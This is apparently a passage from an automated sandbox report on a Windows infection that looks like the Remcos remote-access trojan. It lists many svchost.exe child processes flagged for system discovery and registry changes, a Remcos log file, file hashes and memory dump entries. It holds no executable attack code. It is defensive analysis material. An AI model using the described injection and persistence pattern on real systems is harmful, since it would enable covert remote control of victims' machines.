            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4880
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3652
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:432
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2052
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3888
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1912
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3576
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:716
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4592
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:5100
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2128
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3288
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4800
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3088
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1596
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:212
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1888
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4704
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4328
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:924
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3020
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2792
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1176
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1472
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:512
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4916
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:940
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2528
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4236
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3340
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:5000
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4892
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1328
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1816
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:1968

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\remcos\logs.dat
        Filesize

        140B

        MD5

        540eee10b056d749645915e5d02896a8

        SHA1

        7ae03ac045371251693a7e53cabddcdaa96a06ff

        SHA256

        8fc922519bb125e75091af091f5d60a274e5833da2764a26fc7ea7e85da54ad7

        SHA512

        578c83afcea79794f506052db868df1797405c94cf8e6e53010111fd361724da9ef57225671b64616230ca3759aa4a947b48a3c031aebe145fb891bfd893c6c5

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_urxlscut.5zq.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\owmhrixlbtbavjnsnzpandavbzntr
        Filesize

        4KB

        MD5

        c7ac5a21cac5bd5580a6e28112212613

        SHA1

        0a256177c387053fec680e599bcb63729a16c161

        SHA256

        89e0e7dc8ad418f8613610b71d0c140247e26a5f9a453ee255b1467fb80f15ff

        SHA512

        753675a75b643132e50175d67589a3952cb5154a7e51c11883b2e28bf4fe406afbaed88e61575cc114156e41ed5c587b0f76845e6d20ddf922e775bfff3f0b43

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Dalmatinernes.Sel
        Filesize

        457KB

        MD5

        eaf0eec1825fc4c7702c0de998f46563

        SHA1

        1e52f255ff7538d76b9c23b4ca0019d2d6113f5e

        SHA256

        6fd56dfc09cbc965fa8ce3770653a75e9458cf9d4798c9d8675b89406187a981

        SHA512

        f36e354cdda4f6edbd02e634b9a6852e63c9f04c9396dc2a52b2f7f13791433db27f3670e9858e4b55402aaf902884df714008248ed2cfad6ecf47cf49520849

        Download Submit

      • memory/656-74-0x0000000000270000-0x00000000002F3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/656-72-0x0000000000270000-0x00000000002F3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/656-73-0x0000000000270000-0x00000000002F3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/760-123-0x0000000000E20000-0x0000000000EA3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/760-122-0x0000000000E20000-0x0000000000EA3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/760-124-0x0000000000E20000-0x0000000000EA3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/1200-108-0x0000000000800000-0x0000000000883000-memory.dmp

        Filesize

        524KB

        Download

      • memory/1200-110-0x0000000000800000-0x0000000000883000-memory.dmp

        Filesize

        524KB

        Download

      • memory/1200-109-0x0000000000800000-0x0000000000883000-memory.dmp

        Filesize

        524KB

        Download

      • memory/1520-95-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/1520-88-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/1520-90-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/1940-135-0x0000000000EC0000-0x0000000000F43000-memory.dmp

        Filesize

        524KB

        Download

      • memory/1940-134-0x0000000000EC0000-0x0000000000F43000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2080-89-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/2080-91-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/2080-92-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/2168-117-0x0000000000D30000-0x0000000000DB3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2168-118-0x0000000000D30000-0x0000000000DB3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2168-116-0x0000000000D30000-0x0000000000DB3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2292-96-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2292-94-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2292-93-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2484-87-0x0000000000C30000-0x0000000000CB3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2484-86-0x0000000000C30000-0x0000000000CB3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2484-85-0x0000000000C30000-0x0000000000CB3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2512-79-0x0000000000350000-0x00000000003D3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2512-78-0x0000000000350000-0x00000000003D3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2512-77-0x0000000000350000-0x00000000003D3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2916-119-0x0000000001010000-0x0000000001093000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2916-120-0x0000000001010000-0x0000000001093000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2916-121-0x0000000001010000-0x0000000001093000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3080-126-0x0000000000930000-0x00000000009B3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3080-128-0x0000000000930000-0x00000000009B3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3080-127-0x0000000000930000-0x00000000009B3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3332-113-0x0000000000F10000-0x0000000000F93000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3332-112-0x0000000000F10000-0x0000000000F93000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3332-111-0x0000000000F10000-0x0000000000F93000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3416-103-0x00000000235C0000-0x00000000235D9000-memory.dmp

        Filesize

        100KB

        Download

      • memory/3416-107-0x00000000235C0000-0x00000000235D9000-memory.dmp

        Filesize

        100KB

        Download

      • memory/3416-106-0x00000000235C0000-0x00000000235D9000-memory.dmp

        Filesize

        100KB

        Download

      • memory/3416-55-0x0000000002290000-0x0000000005ABF000-memory.dmp

        Filesize

        56.2MB

        Download

      • memory/3416-54-0x0000000001030000-0x0000000002284000-memory.dmp

        Filesize

        18.3MB

        Download

      • memory/3716-70-0x0000000000640000-0x00000000006C3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3716-69-0x0000000000640000-0x00000000006C3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/3716-71-0x0000000000640000-0x00000000006C3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4016-66-0x0000000000D50000-0x0000000000DD3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4016-65-0x0000000000D50000-0x0000000000DD3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4016-67-0x0000000000D50000-0x0000000000DD3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4080-82-0x0000000001290000-0x0000000001313000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4080-81-0x0000000001290000-0x0000000001313000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4080-80-0x0000000001290000-0x0000000001313000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4392-34-0x0000000008130000-0x00000000087AA000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/4392-17-0x00000000051C0000-0x00000000051F6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/4392-33-0x00000000067D0000-0x000000000681C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4392-36-0x0000000007A00000-0x0000000007A96000-memory.dmp

        Filesize

        600KB

        Download

      • memory/4392-37-0x00000000079B0000-0x00000000079D2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4392-38-0x00000000087B0000-0x0000000008D54000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4392-32-0x00000000067A0000-0x00000000067BE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4392-31-0x00000000061A0000-0x00000000064F4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4392-21-0x0000000006080000-0x00000000060E6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4392-40-0x0000000008D60000-0x000000000C58F000-memory.dmp

        Filesize

        56.2MB

        Download

      • memory/4392-35-0x0000000006D20000-0x0000000006D3A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4392-18-0x00000000058D0000-0x0000000005EF8000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/4392-20-0x0000000005FA0000-0x0000000006006000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4392-19-0x0000000005F00000-0x0000000005F22000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4688-11-0x00007FFACE470000-0x00007FFACEF31000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4688-61-0x00007FFACE470000-0x00007FFACEF31000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4688-0-0x00007FFACE473000-0x00007FFACE475000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4688-15-0x00007FFACE470000-0x00007FFACEF31000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4688-14-0x00007FFACE473000-0x00007FFACE475000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4688-12-0x00007FFACE470000-0x00007FFACEF31000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4688-1-0x0000026BD7870000-0x0000026BD7892000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4736-56-0x0000000000D60000-0x0000000000DE3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4736-57-0x0000000000D60000-0x0000000000DE3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4736-58-0x0000000000D60000-0x0000000000DE3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4764-63-0x0000000000970000-0x00000000009F3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4764-64-0x0000000000970000-0x00000000009F3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/4764-62-0x0000000000970000-0x00000000009F3000-memory.dmp

        Filesize

        524KB

        Download

      • memory/5048-129-0x0000000000600000-0x0000000000683000-memory.dmp

        Filesize

        524KB

        Download

      • memory/5048-130-0x0000000000600000-0x0000000000683000-memory.dmp

        Filesize

        524KB

        Download

      • memory/5048-131-0x0000000000600000-0x0000000000683000-memory.dmp

        Filesize

        524KB

        Download